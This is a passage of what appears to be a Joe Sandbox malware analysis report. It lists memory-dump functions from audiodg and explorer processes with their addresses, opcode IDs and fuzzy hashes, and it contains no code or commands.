                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0829f84b85b0bb708c5c1a886fba534c031fa7d50938fe1e82e0d92b4b8008ca
                                  • Instruction ID: 984144741f8d2a135559c872cbef97a0be978952a0bd897a369ca639b21494dd
                                  • Opcode Fuzzy Hash: 0829f84b85b0bb708c5c1a886fba534c031fa7d50938fe1e82e0d92b4b8008ca
                                  • Instruction Fuzzy Hash: C1F08C30A0E61ECFEB24EB50C860BE973B1FB51700F0541AAC00ED31A1DEB82B848B50
                                  Function 00007FFD9BAB527B Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16d1eece996d269fb7f087a7a6f7482dafd4cbf0d161c2209d3ba44e1185a5c5
                                  • Instruction ID: 6bca7f09fbdbfdd32bbcbeeca7447241327870a4f14a233cb5591efd9572c39d
                                  • Opcode Fuzzy Hash: 16d1eece996d269fb7f087a7a6f7482dafd4cbf0d161c2209d3ba44e1185a5c5
                                  • Instruction Fuzzy Hash: 52D02269E06B0E0FEB40CF4C88AD299B7E5FF24208B00002AD808D3261EF2091004700
                                  Function 00007FFD9BAAB72D Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d733295519c581e71f18f371bc03c395a6df74abb22837498779cbc0aff42ee7
                                  • Instruction ID: 55b18844fd76ebbb2d45b06b3393a0293545ca917def45e3641f54bf824dca10
                                  • Opcode Fuzzy Hash: d733295519c581e71f18f371bc03c395a6df74abb22837498779cbc0aff42ee7
                                  • Instruction Fuzzy Hash: 20D09230A1995E8AEB65EB54C850AEDB261BF18344F1047A6D80DE619ACA74AB808B40

                                  Non-executed Functions

                                  Function 00007FFD9BAB118F Relevance: 6.3, Strings: 5, Instructions: 92COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $+$/$[${
                                  • API String ID: 0-1918162968
                                  • Opcode ID: 9b415181eadb51a34c78d4f84c14bc010a9913a4a8b81e6fa3adc51431b42272
                                  • Instruction ID: c4029fc885cd25bae0c13dbc38ca275a74667587fdca29f9851b1aa24e3335ef
                                  • Opcode Fuzzy Hash: 9b415181eadb51a34c78d4f84c14bc010a9913a4a8b81e6fa3adc51431b42272
                                  • Instruction Fuzzy Hash: 0E41D670E1922DCEEB68DF94D8A47FDB6B1BF14300F1145BED01AA6291CB785A84DF11

                                  Executed Functions

                                  Function 00007FFD9BA90D40 Relevance: .3, Instructions: 289COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5cf36600521a2b2ad50e6f56de685c5b979c8d1cedae7f376593493a83bb3c02
                                  • Instruction ID: a0a1cf6fd65b189626c97c5f80935be71b16be4fafecfcb52cf464584ae493ac
                                  • Opcode Fuzzy Hash: 5cf36600521a2b2ad50e6f56de685c5b979c8d1cedae7f376593493a83bb3c02
                                  • Instruction Fuzzy Hash: 0AB10371E0A50D8FEBB4DB688864BECB3B1EF54750F0042BAD01DE71A6DE782A459B44
                                  Function 00007FFD9BA91758 Relevance: .3, Instructions: 288COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38b4405cc0b72f976458ffdfbec61f296e4566fe9a429d5061b2a5c3ba3786b0
                                  • Instruction ID: 12a7e8c1db9db5a7f7afb230f34f215b918bf2337ab5090bf543711495cb259e
                                  • Opcode Fuzzy Hash: 38b4405cc0b72f976458ffdfbec61f296e4566fe9a429d5061b2a5c3ba3786b0
                                  • Instruction Fuzzy Hash: 2991E031B1DA4D4FEB58DF5C88655B977E2EFE8300B1541BAE49DC72A6DE20AC028781
                                  Function 00007FFD9BA91D6D Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f78cf3f01a45fbf02396308c462aa6bb7a670a0fc2570db20b15c340286e9736
                                  • Instruction ID: 90867ee399eaa1e63a2c69d17482c64eda3c7436cab91f48b80c5ad3ee01b911
                                  • Opcode Fuzzy Hash: f78cf3f01a45fbf02396308c462aa6bb7a670a0fc2570db20b15c340286e9736
                                  • Instruction Fuzzy Hash: CB51CC31B18B8E4FDB58DF4888645BA77E2FFE8300B15457EE45AC7296DE34E8028781
                                  Function 00007FFD9BA935B5 Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e162dde7b2b6b11be50bf8f7b097f642214f47eda2d5f2ed9749429a1d8ff31d
                                  • Instruction ID: 3416cec0f8507750fc85361fdc39690a8a9396687cae2e217dc1d83b1caa7078
                                  • Opcode Fuzzy Hash: e162dde7b2b6b11be50bf8f7b097f642214f47eda2d5f2ed9749429a1d8ff31d
                                  • Instruction Fuzzy Hash: 6A51BF31A1994E8FEB98EB68C866BBD7BF1FF59304F4101B9D00ED7296DE7468018B40
                                  Function 00007FFD9BA93205 Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d514f57d229856d777471f8509613ff90b6cb051a2794d377ac124bdcaf2c2f
                                  • Instruction ID: 8ffd6bace51323f5ec99584e1eeaad952b2e4f7f648325e1fca43e7e8afd9c0e
                                  • Opcode Fuzzy Hash: 7d514f57d229856d777471f8509613ff90b6cb051a2794d377ac124bdcaf2c2f
                                  • Instruction Fuzzy Hash: 9B515B71E0A60E8FEB64EB98C4646FDB7F1EF58310F51417AD009E72A1DEB86A44DB00
                                  Function 00007FFD9BA9371F Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f0d272c7915ca6ac3493432a2e7301f54c840aad3959f1ab7f5a4aec8dbb889
                                  • Instruction ID: 4cb83345d8f13b626ca5ea970e8f2db6ed18e5c1a55ac952b27faa2871a83d95
                                  • Opcode Fuzzy Hash: 1f0d272c7915ca6ac3493432a2e7301f54c840aad3959f1ab7f5a4aec8dbb889
                                  • Instruction Fuzzy Hash: 93419672A19A0D8FE758DF5CD8653A87BF1EB99324F50427ED019C72DADBF418058B40
                                  Function 00007FFD9BA93408 Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9aad65f1fa51679c19a7e2815eb0d9eca42f8f5277fc77178f1f665c37492036
                                  • Instruction ID: 4d8e29296a2d595393539599a3067a3a9b8b50a4a5a31eed991c1c010f87c01c
                                  • Opcode Fuzzy Hash: 9aad65f1fa51679c19a7e2815eb0d9eca42f8f5277fc77178f1f665c37492036
                                  • Instruction Fuzzy Hash: 26218E3094E68A8FD753ABB488686A97FF0FF46315F0604FAD099CB0B2DA789545CB11
                                  Function 00007FFD9BA90A01 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 396fdbd1097a372494f6546d3fbba240390a6a7477f5fd09aa09b29ba024ae8e
                                  • Instruction ID: 09eca6dbbd859c6c19dafb3d6e770f6fe97e59183430e682f314ced58ac5ed8e
                                  • Opcode Fuzzy Hash: 396fdbd1097a372494f6546d3fbba240390a6a7477f5fd09aa09b29ba024ae8e
                                  • Instruction Fuzzy Hash: FA11C471E0950E4FEBA4EBA888A95BD7BE0FF58740F4145B6D41CC70B6EE74A6409740
                                  Function 00007FFD9BA9117D Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ae8d51633029a21380950f4195170c5900a10768bea30d0d2a2910ae5820f48
                                  • Instruction ID: 44fed26b9f84adccf05f016d2660ca614b74bca039c1f04fdc82bfd27fdaca49
                                  • Opcode Fuzzy Hash: 3ae8d51633029a21380950f4195170c5900a10768bea30d0d2a2910ae5820f48
                                  • Instruction Fuzzy Hash: 6C110830A0E64E5EEB69EB6484682F97BE0FF25300F1104BFD01DC60E2EE756640D740
                                  Function 00007FFD9BA93535 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 79c3c5c1251bc763aa396d09dff2399ec6068e5673a457fa867d8c691776816b
                                  • Instruction ID: 76f16672221917149bb8454c5210e313776f1ab89c2f38c60389c296c4906663
                                  • Opcode Fuzzy Hash: 79c3c5c1251bc763aa396d09dff2399ec6068e5673a457fa867d8c691776816b
                                  • Instruction Fuzzy Hash: F6111270A1964E8FDB59EF64C4696BD7BF0FF19304F4104BED419C61A1DB7595408740
                                  Function 00007FFD9BA922A1 Relevance: .1, Instructions: 52COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 756bbd2a8c8523f398eb27f5826f85efa376553369304a900b3bcda541f9881b
                                  • Instruction ID: 3f88e94b6d330780ac3a379ed9a68eecbafa13f23076de4132452f65265cdfe1
                                  • Opcode Fuzzy Hash: 756bbd2a8c8523f398eb27f5826f85efa376553369304a900b3bcda541f9881b
                                  • Instruction Fuzzy Hash: F9017130A4E64E9FE765EBB884695B97BE0EF5A300F4244B6D418C70B6EE74A5809701
                                  Function 00007FFD9BA905D8 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e236f3940238a5bb0b994519f506b2d5a3c624ee2abd62fafda0c9c6f8eec61
                                  • Instruction ID: 0289b68b6797c2a13252f60843ce80ff6f0c39e229141f78975f6906e1fe0a02
                                  • Opcode Fuzzy Hash: 6e236f3940238a5bb0b994519f506b2d5a3c624ee2abd62fafda0c9c6f8eec61
                                  • Instruction Fuzzy Hash: 31019E30A0950E9FDB98EF68C4656BA77A1FF68304F51447ED41EC21E4CE75A650CB40
                                  Function 00007FFD9BA92F11 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef0f7aff6fc2bbc5f3d080e23f6c8ec643cab10be09a5a5a95141f0fad2d0352
                                  • Instruction ID: aa49c484d86757679882684733e2f198ffe49138b90005d7a6fd6784f847b38e
                                  • Opcode Fuzzy Hash: ef0f7aff6fc2bbc5f3d080e23f6c8ec643cab10be09a5a5a95141f0fad2d0352
                                  • Instruction Fuzzy Hash: 9001D470E1A64E8FE765EBA488695B97BE0EF19300F4249B6D40CC70B2EE74E2549701
                                  Function 00007FFD9BA928ED Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e08abc085864bbc018a47eebdc15a7eb6d8fa6ba651853750bd65731614d8fe0
                                  • Instruction ID: 78111ca00cb91c54efb67546179e914d0d7eb8605e253a4ff171aa9ccc048ae9
                                  • Opcode Fuzzy Hash: e08abc085864bbc018a47eebdc15a7eb6d8fa6ba651853750bd65731614d8fe0
                                  • Instruction Fuzzy Hash: CD018F31E0A64E4FE769EFA488A86F97BE0EF19300F4245B6D408C70B6EE74E644D741
                                  Function 00007FFD9BA92F89 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd9f9378163893c4a5e5c6977ee67fe36d43e63b7ff16d28f9ce7c1add2d5970
                                  • Instruction ID: 6dd23cca2b18f1cdeb3690ca317122a33b1d4d1ce75d2380044da5ad0b6e3b7a
                                  • Opcode Fuzzy Hash: dd9f9378163893c4a5e5c6977ee67fe36d43e63b7ff16d28f9ce7c1add2d5970
                                  • Instruction Fuzzy Hash: 1101D471A0E74D4FE766E7B488695A97FE0EF05300F0604F7C408CB0B6DA78A6588701
                                  Function 00007FFD9BA90610 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e24a3ff3bbc68fce8293dc7a0482ec4f7b023f3d69fc96fab852a25d768f58ed
                                  • Instruction ID: c11f1d71ba4340aee635b70c3d0c8a766542724c95bd011d0617cfa6271883e6
                                  • Opcode Fuzzy Hash: e24a3ff3bbc68fce8293dc7a0482ec4f7b023f3d69fc96fab852a25d768f58ed
                                  • Instruction Fuzzy Hash: 3C018630A19A0E8AEB5CEBA4C4685B973E0FF18305F11447ED41EC21E5DF75A650CB00
                                  Function 00007FFD9BA90608 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e6f56578c0319f1e5120baf57a66a57127dbbb03ca67d18f08c4f6eb13e2c9
                                  • Instruction ID: 9b34dbdbcc5e2b159234fb6107ce218e44248d3d84f66dcceed876743c9c4661
                                  • Opcode Fuzzy Hash: c1e6f56578c0319f1e5120baf57a66a57127dbbb03ca67d18f08c4f6eb13e2c9
                                  • Instruction Fuzzy Hash: 03018130A1960E8BEB6CEFA4C4696BD73A0FF18305F1188BED41EC21E5DF75A254DA00
                                  Function 00007FFD9BA91CED Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15ff13d030b2e726c49151cd400a6e9f412a28403cf40a6df5cbb322fb10cdbf
                                  • Instruction ID: a1b46e246b7284d72983e579ad5bc55273e8c74c92f41e572f2ac36f8f5071ea
                                  • Opcode Fuzzy Hash: 15ff13d030b2e726c49151cd400a6e9f412a28403cf40a6df5cbb322fb10cdbf
                                  • Instruction Fuzzy Hash: 0401F930A0A68E9FDB94DF5484651F97BE0FF65304F41047EE81CC21E1DBB99550DB40
                                  Function 00007FFD9BA905D0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be2bc6f0160237cfc486113b47c3e26e29aacdea7af3104af0fef270f81192ee
                                  • Instruction ID: b2e91d77da55d63296ebfa8fe452b1b372554d4ce3aa9b3838cddd38755618ac
                                  • Opcode Fuzzy Hash: be2bc6f0160237cfc486113b47c3e26e29aacdea7af3104af0fef270f81192ee
                                  • Instruction Fuzzy Hash: E6F0FC30A0A54E9FDB94EF6884255FA7790EF25309F51047AE81DC20D1CE75A650CB40
                                  Function 00007FFD9BA91190 Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c8a4eab8fd9a4d2af489d55ebe5ac74ded4c44dd5eb199a54f6751977c41dec
                                  • Instruction ID: 330536a21cdb85cf01dab50b8931884f8c55de56a76dbba6dee3b1254bc49aef
                                  • Opcode Fuzzy Hash: 8c8a4eab8fd9a4d2af489d55ebe5ac74ded4c44dd5eb199a54f6751977c41dec
                                  • Instruction Fuzzy Hash: D6F0C830E1E55F99EBA5ABA488682F976E4EF65305F10053FD41DC20E1EFB812549640
                                  Function 00007FFD9BA92809 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd1973d047c744bbb158975c9da76a0104b4f14013032766db6af51af47e0935
                                  • Instruction ID: ddf112dfd53582df00ab748cf845887dace08871ad9db286de6ba07c8df18fe9
                                  • Opcode Fuzzy Hash: fd1973d047c744bbb158975c9da76a0104b4f14013032766db6af51af47e0935
                                  • Instruction Fuzzy Hash: E8F0C23190E38E8FDB699F7488651E93F60AF56200F4644FAE408C60F2DAB8A548D701
                                  Function 00007FFD9BA9287D Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2509746a3c7f5d5af0921bd08208200277a485de107af1da41fc0b47b2e20e0b
                                  • Instruction ID: 5e5ab60781646ac52b6663e76f88cc6e07bf9ffaaf22f297cd427b39d24102c6
                                  • Opcode Fuzzy Hash: 2509746a3c7f5d5af0921bd08208200277a485de107af1da41fc0b47b2e20e0b
                                  • Instruction Fuzzy Hash: BFF0243090E78E8FEB6C9FA084641F93BA0FF15304F4240BEE418C50E1DB78E5448700
                                  Function 00007FFD9BA95C06 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction ID: 59403e8b21ed33d7d227815d8300b00ab9de4d110756848dace27f7bb8f8d88a
                                  • Opcode Fuzzy Hash: d8611139f153c53c4eb751b61a7e00d8b8c24fac7b03b308f9bb26b0e778ac99
                                  • Instruction Fuzzy Hash: F0F0D4B0D0A51D8EDBA8DB088855BE9B7B1FB59300F1000EEC10DE72A1DA305A80DF04

                                  Non-executed Functions

                                  Function 00007FFD9BA90525 Relevance: .1, Instructions: 103COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2938474311.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_7ffd9ba90000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a2642f5bbd2ebdca6f165b34a1db3cdd7ab620076b4ba1c6adf6c10841c1f67
                                  • Instruction ID: 3f156e04028878f37a26dca48032c68e9f689ebf696971a4bac5a919888549f7
                                  • Opcode Fuzzy Hash: 6a2642f5bbd2ebdca6f165b34a1db3cdd7ab620076b4ba1c6adf6c10841c1f67
                                  • Instruction Fuzzy Hash: 50212E23B4F15A6FE331E7ACFC764EA3B64DF91369B064173D089C50A2E9586246C210

                                  Executed Functions

                                  Function 00007FFD9BAAD668 Relevance: .6, Instructions: 550COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 695a23a2e0c8b4669c38a9d01777340d7972f991ade69c9e47c7c79a1250494b
                                  • Instruction ID: 5247b79ffcf51f82df9b959074d88b6c19783106a601701c95081eff7fe34865
                                  • Opcode Fuzzy Hash: 695a23a2e0c8b4669c38a9d01777340d7972f991ade69c9e47c7c79a1250494b
                                  • Instruction Fuzzy Hash: 50128E31E1964D8FEB99EF68C8647B8BBB2FF19304F0501BAD08DD71A2CA746940CB11
                                  Function 00007FFD9BAAC240 Relevance: .5, Instructions: 549COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf2279708d118f520923061d797107ceb26e0b0bd69b7fb7fc3b58f5281447c5
                                  • Instruction ID: 2b64ea3e3fd7141abd7723084fdfa53582b1591d6526be66d72b8b6677480b30
                                  • Opcode Fuzzy Hash: cf2279708d118f520923061d797107ceb26e0b0bd69b7fb7fc3b58f5281447c5
                                  • Instruction Fuzzy Hash: 03024531A0E68A4FE766AB689C251F93BB0FF06325F0501BBD449CB0A3EA7C6545C761
                                  Function 00007FFD9BAACC28 Relevance: .4, Instructions: 393COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea32893a5b5026976f982b00f496e2158e27c9d7ee8d908e4f8065bfd4049fbc
                                  • Instruction ID: cc246f7404897db2b73aa21cabb59c6385f442cf6da7fb8f98c7bed7853fa2d3
                                  • Opcode Fuzzy Hash: ea32893a5b5026976f982b00f496e2158e27c9d7ee8d908e4f8065bfd4049fbc
                                  • Instruction Fuzzy Hash: F6D1D630A0A64E8FEBA5EB64C8796B97BE1FF19300F0145BED42DC71A2DE746644CB41
                                  Function 00007FFD9BAAA71D Relevance: .3, Instructions: 328COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000002C.00000002.2787536579.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_44_2_7ffd9baa0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9234595ca1bddadf679c52ccfb2e1f648a997a925d2a8c403eb0036edf231647
